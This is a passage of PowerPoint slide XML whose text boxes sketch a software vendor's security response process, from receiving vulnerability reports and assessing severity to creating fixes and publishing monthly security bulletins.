          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="173038" indent="-173038">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="folHlink"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buBlip>
                <a:blip r:embed="rId6"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1"/>
              <a:t>Assess potential impact and severity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31750" name="Picture 9" descr="Slide-5_Box-B"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3560763" y="1676400"/>
            <a:ext cx="1855787" cy="1174750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43018" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733800" y="1905000"/>
            <a:ext cx="1371600" cy="496888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="folHlink"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="folHlink"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Researchers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31752" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="2601913"/>
            <a:ext cx="1905000" cy="558800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="173038" indent="-173038">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="folHlink"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buBlip>
                <a:blip r:embed="rId6"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1"/>
              <a:t>Establish communications channel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31753" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="3335338"/>
            <a:ext cx="1905000" cy="1409700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="173038" indent="-173038">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="folHlink"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buBlip>
                <a:blip r:embed="rId6"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1"/>
              <a:t>Secure@Microsoft.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="173038" indent="-173038">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="folHlink"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buBlip>
                <a:blip r:embed="rId6"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1"/>
              <a:t>Newsgroups, web sites, partners, others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="173038" indent="-173038">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="folHlink"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buBlip>
                <a:blip r:embed="rId6"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1"/>
              <a:t>Microsoft TechNet Security Site – FAQs for reporting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31754" name="Group 14"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="41275" y="2438400"/>
            <a:ext cx="1855788" cy="1174750"/>
            <a:chOff x="0" y="1488"/>
            <a:chExt cx="1169" cy="617"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="31779" name="Picture 15" descr="Slide-5_Box-B"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="1488"/>
              <a:ext cx="1169" cy="617"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43024" name="Text Box 16"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="71" y="1601"/>
              <a:ext cx="871" cy="238"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="folHlink"/>
                </a:buClr>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000"/>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Vulnerability Reports</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31755" name="Group 17"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="1295400"/>
            <a:ext cx="1855788" cy="2384425"/>
            <a:chOff x="3408" y="768"/>
            <a:chExt cx="1169" cy="1251"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="31775" name="Group 18"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3408" y="768"/>
              <a:ext cx="1169" cy="617"/>
              <a:chOff x="3434" y="765"/>
              <a:chExt cx="1169" cy="617"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="31777" name="Picture 19" descr="Slide-5_Box-B"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:srcRect/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3434" y="765"/>
                <a:ext cx="1169" cy="617"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="43028" name="Text Box 20"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3614" y="879"/>
                <a:ext cx="662" cy="238"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="12700" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr>
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="85000"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buClr>
                    <a:schemeClr val="folHlink"/>
                  </a:buClr>
                  <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                  <a:buNone/>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                    <a:effectLst>
                      <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                        <a:srgbClr val="000000"/>
                      </a:outerShdw>
                    </a:effectLst>
                    <a:latin typeface="Arial" charset="0"/>
                    <a:cs typeface="Arial" charset="0"/>
                  </a:rPr>
                  <a:t>Content Creation</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31776" name="Rectangle 21"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3408" y="1248"/>
              <a:ext cx="1102" cy="771"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="173038" indent="-173038">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="folHlink"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1"/>
                <a:t>Security bulletin</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="173038" indent="-173038">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="folHlink"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1"/>
                <a:t>Field communications</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="173038" indent="-173038">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="folHlink"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1"/>
                <a:t>Web casts</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="173038" indent="-173038">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="folHlink"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1"/>
                <a:t>Emails and RSS feeds</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="173038" indent="-173038">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="folHlink"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1200" b="1"/>
            </a:p>
            <a:p>
              <a:pPr marL="173038" indent="-173038">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="folHlink"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="900" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31756" name="Group 22"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7239000" y="990600"/>
            <a:ext cx="1905000" cy="1828800"/>
            <a:chOff x="4560" y="576"/>
            <a:chExt cx="1200" cy="960"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31771" name="Rectangle 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4560" y="1056"/>
              <a:ext cx="1056" cy="480"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="173038" indent="-173038">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="folHlink"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1"/>
                <a:t>Security bulletins - second Tuesday of every month</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="173038" indent="-173038">
                <a:lnSpc>
                  <a:spcPct val="85000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="folHlink"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1"/>
                <a:t>Monitor customer issues</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="31772" name="Group 24"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4591" y="576"/>
              <a:ext cx="1169" cy="617"/>
              <a:chOff x="4182" y="2380"/>
              <a:chExt cx="1244" cy="657"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="31773" name="Picture 25" descr="Slide-5_Box-B"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:srcRect/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4182" y="2380"/>
                <a:ext cx="1244" cy="657"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="43034" name="Text Box 26"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4375" y="2554"/>
                <a:ext cx="711" cy="153"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="12700" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr>
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="85000"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buClr>
                    <a:schemeClr val="folHlink"/>
                  </a:buClr>
                  <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                  <a:buNone/>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                    <a:effectLst>
                      <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                        <a:srgbClr val="000000"/>
                      </a:outerShdw>
                    </a:effectLst>
                    <a:latin typeface="Arial" charset="0"/>
                    <a:cs typeface="Arial" charset="0"/>
                  </a:rPr>
                  <a:t>Release</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31757" name="Group 27"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4495800"/>
            <a:ext cx="1866900" cy="1547813"/>
            <a:chOff x="1385" y="2688"/>
            <a:chExt cx="1176" cy="813"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="31767" name="Group 28"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2688"/>
              <a:ext cx="1169" cy="617"/>
              <a:chOff x="1392" y="2688"/>
              <a:chExt cx="1169" cy="617"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="31769" name="Picture 29" descr="Slide-8_RedBox"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId7"/>
              <a:srcRect/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1392" y="2688"/>
                <a:ext cx="1169" cy="617"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="43038" name="Text Box 30"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1547" y="2808"/>
                <a:ext cx="721" cy="238"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="12700" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr>
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="85000"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buClr>
                    <a:schemeClr val="folHlink"/>
                  </a:buClr>
                  <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                  <a:buNone/>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                    <a:effectLst>
                      <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                        <a:srgbClr val="000000"/>
                      </a:outerShdw>
                    </a:effectLst>
                    <a:latin typeface="Arial" charset="0"/>
                    <a:cs typeface="Arial" charset="0"/>
                  </a:rPr>
                  <a:t>Create</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                    <a:effectLst>
                      <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                        <a:srgbClr val="000000"/>
                      </a:outerShdw>
                    </a:effectLst>
                    <a:latin typeface="Arial" charset="0"/>
                    <a:cs typeface="Arial" charset="0"/>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                    <a:effectLst>
                      <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                        <a:srgbClr val="000000"/>
                      </a:outerShdw>
                    </a:effectLst>
                    <a:latin typeface="Arial" charset="0"/>
                    <a:cs typeface="Arial" charset="0"/>
                  </a:rPr>
                  <a:t>the Fix</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31768" name="Rectangle 31"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1385" y="3188"/>
              <a:ext cx="1104" cy="313"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
